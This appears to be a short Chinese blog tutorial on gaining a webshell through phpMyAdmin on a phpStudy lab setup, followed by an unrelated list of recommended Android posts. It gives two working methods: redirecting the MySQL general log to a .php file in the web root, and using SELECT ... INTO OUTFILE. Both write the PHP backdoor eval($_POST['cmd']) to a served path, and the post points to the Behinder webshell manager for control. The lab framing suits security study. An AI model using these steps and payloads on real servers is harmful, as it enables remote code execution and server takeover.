常见cms漏洞之PhPMyadmin

环境phpstudy

安装后直接访问即可密码为mysql的密码,在小皮中即可查看

通过日志文件拿Shell

利用mysql日志文件写shel,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell。

把值修改为on,以及www下的php文件

然后去select语句

复制代码
select "<?php phpinfo();eval($_POST['cmd']);?>"

导入导出拿WebShell

1.首先判断mysql位置

复制代码
select @@datadir

2.猜测web路径猜测web路径扩展的同级目录下存在www目录

复制代码
C:\phpstudy_pro\WWW\222.php

3.写入webshell

复制代码
select  "<?php phpinfo();@eval($_POST[cmd]);" into outfile "C:/phpstudy_pro/WWW/222.php"

对webshell使用冰蝎吧!

相关推荐
走在路上的菜鸟19 小时前
Android学Dart学习笔记第四节 基本类型
android·笔记·学习
百锦再19 小时前
第21章 构建命令行工具
android·java·图像处理·python·计算机视觉·rust·django
skyhh21 小时前
Android Studio 最新版汉化
android·ide·android studio
路人甲ing..21 小时前
Android Studio 快速的制作一个可以在 手机上跑的app
android·java·linux·智能手机·android studio
携欢1 天前
PortSwigger靶场之Web shell upload via path traversal靶场通关秘籍
android
消失的旧时光-19431 天前
Android ADB指令大全详解
android·adb
ashcn20011 天前
opengl 播放视频的android c++ 方案
android·c++ opengl es
abner.Li1 天前
android 反编译
android
Digitally1 天前
如何删除 realme 手机上的短信
android
2501_916008891 天前
提高 iOS 应用逆向难度的工程实践,多工具联动的全栈安全方案
android·安全·ios·小程序·uni-app·cocoa·iphone